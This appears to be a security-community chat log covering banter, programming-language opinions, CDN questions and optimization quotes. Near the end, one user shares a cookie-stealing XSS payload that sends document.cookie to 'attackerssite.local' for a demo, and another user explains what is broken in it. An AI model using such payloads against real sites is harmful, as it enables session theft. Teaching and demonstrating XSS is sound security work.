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huffingtonpost.com/2013/10/14/… @Iszi how you surviving?
Huffington Post - how have I never tried this site before?? It's like Reddit posing as a real newspaper.
@AviD I'll be okay until Friday. Then I get a half-paycheck and things get really interesting.
@Iszi but the senator said you should get loans!
@paste! new gravatar!
@Iszi they mentioned someplace that eventually they will give backpay. is that everyone?
@paste meh, cute, but I prefered the old one. ;-)
@AviD Civil servants, sure. Contractors are not guaranteed.
@AviD Add me on facebook. Then you can see all my pictures ;)
@paste hehe. I don't DO facebook.
now, if those pictures are enticing enough, I might reconsider.
damn, that level of creepiness is worthy of @Adnan.
I think I'm getting it now.
anyway, I dont know your real name.
Ask Iszi.
@paste why ask @Iszi, when one can just search the interwebz.
you forget what room you're in... we can find you.
oo, @Adnan, I'm on a roll here.
I'm an open book on the internet.
yahoo answers in particular....
Huh? You got the wrong one.
like I said, I dont do facebook...
But you can see my name and pictures there.
@paste cant see it...
> This content is currently unavailable
That's weird. Oh well.
@paste besides, why are you so anxious to show complete internet strangers your pictures...? ;-)
I like creeps calling me at night.
anyone else think this should be flagged to migrate to us...?
Q: How to destroy a CD/DVD rom safely?

HaLaBiI have old CDs/DVDs which have some backups, these backups have some work and personal files. I always had a problem when I needed to destroy them (physically) to make sure no one will reuse them. Breaking them is dangerous, pieces could fly fast and may cause harm. Scratching them badly is wha...

except that it looks like good answers already.
@paste hahaha
Watch out guys, there's a vulnerability in programming languages. You can open networking connections...and execute commands...
dangerous shit
@LucasKauffman That's still up? I would have thought they'd have taken it down in shame by now.
So you ask a client "Would you like to do A or B" and they say "Yes, that would be great". .... Yeah.. Thanks.
@tylerl Imma try that on the airplane next time.
"Chicken or beef?"
"... Yes."
@tylerl they're letting you pick, so do the easiest one and bill them for the most difficult one
@Gilles LOLed
@tylerl or you could be a prick and point out that they apparently didnt understand the trade-off between them, and thus the difference.
@AviD That's the problem when dealing with people who have more money than they can count: every time you tell them that they're dumb, they give you less of their money.
"no no, its MY fault, I didnt explain properly what I meant."
@AviD ah, now you are a customer service deity
@tylerl the trick is to get them to THINK they're dumb, in relation to your brilliance, without it coming from YOU.
@tylerl Professional Services Consultant, brah! FTW!
Oh - did you see this?
WhatsApp crypto flawed shocker :-)
and people dont understand why I dont install it to all my families' devices.
it's better, but still broken
I'm looking at New Relic and CloudFlare. Does New Relic do everything CloudFlare does (and more) or am I going to benefit from both?
you want to have a relationship with both of them, at the same time? That's very brave of you.
Well this is what I am trying to ask/ find out
Can anyone help? I want protection from DDOS attacks, and protection from known 'dodgy' visitors. I believe CloudFlare does this, but does New Relic (as I also want some of the things New Relic offers too)?
Why don't you ask the people who actually work for New Relic?
I'm looking for also (a) an honest view from people that don't work for them (b) an honest comparison of the two products.
@user2143356 Am I missing something? CloudFlare is a CDN, and as far as I know, New Relic is monitoring software, no?
As far as I'm aware, they don't compete with each other at all.
So I'll use both, but AviD says "you want to have a relationship with both of them, at the same time? That's very brave of you" - so what does that mean?
@user2143356 oh sorry, typical irrelevant snark. you can never expect anything else from that @AviD fellow.
@user2143356 Ehh...He's probably just alluding to the fact that relationships with enterprise software companies in general can be less fun than, oh, poking out your eyes with a pencil.
actually I was thinking what @Xander said, but I figured I didnt know better, so I stayed offtopic.
@Xander actually, I was making a subtle reference to the fact that relationships with enterprise software companies in general can be compared to certain deviant romantic relationships.
@AviD LOL. And unfortunately, I know exactly what you're referring too, and it's an unfortunately accurate observation.
see, it WAS subtle, you understand but didnt know thats what I was saying till I explained it. ;-)
Yay! I'm learning subtlety!
speaking of which, @RoryAlsop and others - Game of Thrones parody. The good kind. ;-)
Guys what's your take on Ruby?
@Griffin I think she's nice enough, but I wouldn't date her.
@tylerl ..... Idk seems hot.
@Griffin High maintenance, though.
@tylerl The hot ones usually are.
@Griffin The language is nice; it has a lot of cool features, but I think it imports some of the most confusing aspects of perl which affects maintainability and readibility.
@tylerl What about efficiency? Also heard it derpaderps a lot.
@tylerl once you turn your head in the right direction, it is very readable.
@Griffin It's on the same order as Python and Perl. Which is pretty derpy, but passable if it's not in the critical path.
@Griffin talk to @RoryMcCune, he's the ruby expert.
I am very much not, but I like the language design a lot.
hello guys, iam preparing a demo of how to inject code into web applications and i have a problem with this xss: test<script>var i=new image; i.src='http://attackerssite.local/'document.cookie;</script>
@AviD I think of it as being python... of web development. Rapid dev in web dev doesn't seem smart.
iam putting this code into a subject field while private messaging but it does not work. <script>alert('test');</script> worked
For performance, you get 3 main groups: native compiled (e.g. C) is fastest, VM complied [C#, Java] is slower, but still fast, and then interpreted [Ruby, Python, Perl] is slowest.
@ycelik start by making sure your js works normally in a regular html page when loaded in a browser.
e.g. you're missing a "+", ;, and you didnt output the image to the page at any point.
@Griffin why not?
@Griffin I assumed that Python was the Python of web development.
@AviD Because it's not needed (unless it's something mission critical then it's needed). Like why waste resources when you can do something a different way but more efficiently.
@Griffin huh? are you sure thats not backwards?
rapid dev doesnt waste resources, it conserves it.
@Griffin Rapid dev allows you to get something running fast, which you then profile to find our inefficiencies. Premature optimization is the root of all evil, remember?
@tylerl How premature.
@AviD System resources. Like compiling vs interpreted.
ah. but one does not imply the other.
@Griffin Quote from Knuth back in 1974.
Don't try to optimize things before you know what's slow
still applies today.
@tylerl (you know thats not the whole quote, right...?)
@tylerl One does not simply stop applying Knuth.
@AviD Yes, but I didn't have a lot of space.
"We should forget about small efficiencies, say about 97% of the time: premature optimization is the root of all evil"[
go on...
@AviD All wiki gave me :(
It did note "In practice, it is often necessary to keep performance goals in mind when first designing software, but the programmer balances the goals of design and optimization."
first hit on the googles: c2.com/cgi/wiki?PrematureOptimization
On another note: I suddenly want the D dlang.org
> We should forget about small efficiencies, say about 97% of the time: premature optimization is the root of all evil. Yet we should not pass up our opportunities in that critical 3%.
@AviD thanks for your help avid, i tried to get it work but my editor isnt printing a helpful error msg :( can you plz tell me where the problem is? i tried 'http......'+document.cookie; but it didnt work
that misquote is responsible for more horrible performance than alcohol.
@AviD Here you go:
A: Clean readable code vs fast hard to read code. When to cross the line?

tylerlClean code is not necessarily exclusive with fast-executing code. Normally difficult-to-read code was written because it was quicker to write, not because it executes any faster. Writing "dirty" code in an attempt to make it faster is arguably unwise, since you don't know for certain that your c...

there's your whole quote.
Comments make code easy to read.
in context, even.
arguabley the last sentence does not add much beyond the previous one, but good elucidation.
I will point out that sometimes you dont need to profile. Sometimes the architecture is a clear and present effect.
see e.g. Mar Gravell's answer there.
I like this more and more as I read about it: dlang.org
@AviD Typically the result of previous profiling that you know about. You implement a python regex library in C because you know that a state machine in C is significantly faster than one in a higher-level language.
@tylerl fair enough. And you know that an in-memory cache is orders of magnitude faster than loading a file over the network.
@Griffin D is a great language if only as an example to others in how not to design a language. It tries to be everything to everyone and as a result is used by no one.
@tylerl similar to PHP, except for the last detail.
PHP is a great language if only as an example to others in how not to design a language. It tries to be everything to everyone - and yet it is used by oh so many.
@tylerl But it looks very C like :( I like C.
@AviD PHP is more like an example of what happens when people like Rasmus Lerdorf are actually listened to.
And deity help us if that ever happens again
ppl help me :))
@tylerl Preferred web dev language?
18 mins ago, by AviD
e.g. you're missing a "+", ;, and you didnt output the image to the page at any point.
@Griffin I use primarily Python right now. Not a fan of how it plays fast-and-loose with types, but it's slightly better supported on many systems than Ruby, and I'm not really a fan of Rails.
I was expecting a JS or something.
And node.js is like a practical joke that the hipsters thought was the next big thing.
@AviD why do i need to output a message? shouldnt it do a get request with cookie info to attackerssite.local?
Worth pointing out that Python has very poor concurrency support, though.
At least cPython does. Other implementations are much better.
@ycelik no, until the image object is in the page it doesnt try to load the src.
gnite folks.
ok thc

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